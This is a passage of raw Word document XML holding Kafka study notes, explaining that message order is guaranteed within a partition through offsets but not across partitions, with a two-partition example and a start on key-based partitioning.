          <w:numId w:val="241"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A physical storage unit for the topic's data, enabling parallelism, scalability, and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E822D9" w14:textId="28BDB804" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009964FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2C67E4B5">
          <v:rect id="_x0000_i3077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="312321A1" w14:textId="7179E3A1" w:rsidR="006E0265" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80EE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="765" w:name="_Toc196308245"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Is there any ordering of messages in partitions in kafka</w:t>
      </w:r>
      <w:r w:rsidR="006E0265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="765"/>
    </w:p>
    <w:p w14:paraId="4F5E78CA" w14:textId="42C9F6C7" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D" w:rsidP="008D528B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Yes,</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message ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>guaranteed within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764CADB4" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D" w:rsidP="0086529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Points about Ordering of Messages in Kafka Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B0C7CD" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ordering within a Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EDF596" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka guarantees that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>messages within a single partition are strictly ordered</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means that the order in which messages are written to a partition is the same as the order in which they are read by consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F36DE9" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each message in a partition is assigned a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that represents its position in the partition. Consumers can use these offsets to read messages in the exact order they were produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC4536" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No Ordering Across Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187D99F" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guarantee any ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across multiple partitions of a topic. If a topic has multiple partitions, Kafka does not ensure that messages in one partition will be read in order relative to messages in another partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B47AA9" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For example, if a producer sends messages to two partitions, one message in partition 1 could be consumed before another message in partition 2, but Kafka will not guarantee the order between these partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD26D54" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why Ordering is Guaranteed within Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB8F160" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka's design is based on partitioning data for scalability. Each partition is an independent log file, and the ordering is maintained because the log is written sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E10E31D" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Consumers read data sequentially based on offsets, so each consumer reading from a partition will always get messages in the same order in which they were produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E5B750" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D" w:rsidP="0086529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB6417F" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D" w:rsidP="0086529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Suppose you have a topic with two partitions (partition 0 and partition 1). If messages are produced as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB58E9" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition 0: Message 1, Message 2, Message 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8ED031" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition 1: Message 4, Message 5, Message 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5B0B5" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The order of messages within partition 0 is guaranteed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8DF79" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 1 will read Message 1, then Message 2, then Message 3 from partition 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD22F5A" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The order of messages within partition 1 is also guaranteed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F560E" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 2 will read Message 4, then Message 5, then Message 6 from partition 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23452011" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D" w:rsidP="0086529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka does not guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that Message 1 will be consumed before Message 4 since they are in different partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC02DF" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D" w:rsidP="0086529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Practical Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5236DE8E" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can control which partition they send messages to, usually by using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If the same key is used for related messages, they will end up in the same partition, ensuring that related messages maintain the correct order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04DA9C" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
